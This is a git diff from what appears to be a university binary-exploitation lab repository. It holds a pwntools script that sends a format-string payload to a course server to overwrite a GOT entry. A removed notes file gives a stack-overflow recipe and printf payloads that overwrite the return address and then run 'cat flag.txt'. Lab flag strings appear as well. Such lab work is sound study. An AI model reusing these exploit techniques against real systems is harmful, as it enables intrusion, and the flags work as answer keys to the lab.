diff --git a/4/level10/test.py b/4/level10/test.py
index c608ca3..115e673 100644
--- a/4/level10/test.py
+++ b/4/level10/test.py
@@ -15,8 +15,10 @@ print("win     : ", hex(win_addr))
 
 #for i in range(1,30):
 #print("##################### ", i)
-p = process(elf.path)
-#p = remote("localhost", 4010)
+#p = process(elf.path)
+p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4010)
+payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
+p.sendline(payload.encode())
 
 context.clear(arch = 'amd64')
 payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
diff --git a/4/level11/test b/4/level11/test
deleted file mode 100644
index 9517151..0000000
--- a/4/level11/test
+++ /dev/null
@@ -1,7 +0,0 @@
-last key
-32 byte filler
-overwrite rbp with sane address (doesnt need to be specific, just dont segfault bc of memory region)
-overwrite rip with address of win
-
-#printf 'hacklab{why_c4n7_y0u_ju57_d0_th3_m4th_eBPiC6YB}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt
-printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x56\x13\x40\00\00\00\00\00\ncat flag.txt\n'